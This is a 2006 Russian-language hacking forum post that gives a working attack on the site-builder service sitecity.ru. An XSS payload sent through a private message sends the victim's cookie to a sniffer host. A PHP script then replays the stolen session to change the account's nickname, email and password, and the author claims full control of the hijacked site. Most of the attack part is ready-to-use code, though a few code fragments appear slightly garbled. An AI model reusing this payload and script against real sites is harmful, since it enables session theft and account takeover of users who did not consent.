ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #3  
Старый 30.05.2006, 00:24
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию

Отрывок из моей статьи, кторую я все обещаю выложить, да все никак руки не доходят ))


любой банальный XSS скрипт в ЛС, например:
Код:
<img src="http://sasa" style="background:white url(javascript:document.images[0].src='http://sniff/s.php?'+document.cookie)">
Изменим пароль, имя с фамилией и емейл. (Кстати можно пойти от дефа и аж до удаления сайта, подтверждающих паролей нет нигде)

PHP код:
<? 
$nick
="PinkPanther";
$mail="qwerty@qwerty.ru";
$new_password="123456";
 
$query=$_SERVER["QUERY_STRING"];
$query=urldecode($query);
$refer=getenv("HTTP_REFERER");
$ref1=strpos($refer,"id=")+3
$session=substr($refer,$ref1,32); 
 
$post="sid=".$session."&act=send&uname=".$nick."&email=".$m ail."&passwd_1=".$new_password."&passwd_2=".$new_password."&pager_type=non&pager=&lang=rus&gpasswd=&is_news=on&is_notify=on&news_encoding=koi&news_lang=rus&%C8%E7%EC%E5%ED% E8%F2%FC=%C8%E7%EC%E5%ED%E8%F2%FC";
 
$len=strlen($post);
 
$header="POST http://sitecity.ru/adm_base.phtml HTTP/1.0 ";
$header.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */* ";
$header.="Referer: http://sitecity.ru/adm_base.phtml?sid=".$session." ";
$header.="Content-Type: application/x-www-form-urlencoded ";
$header.="Host: sitecity.ru ";
$header.="Content-Length: $len ";
$header.="Cookie: ".$query." ";
$header.=" ";
$header.=$post
 
$fp=fsockopen("sitecity.ru"80); 
fwrite($fp$header); 
fclose($fp); 
?>
Вот так вот. Теперь мы имеем полный контроль над захваченным сайтом.
Еще хочу заметить, что на этом, баги не заканчиваются))

Так же, прочитавших это, по человечески прошу никогда не делать подобное:
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss черви и вирусы: сообщества уязвимых Utochka Чужие Статьи 3 28.08.2006 00:26
XSS (passive) на sitecity.ru _kREveDKo_ Уязвимости 2 20.05.2006 23:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ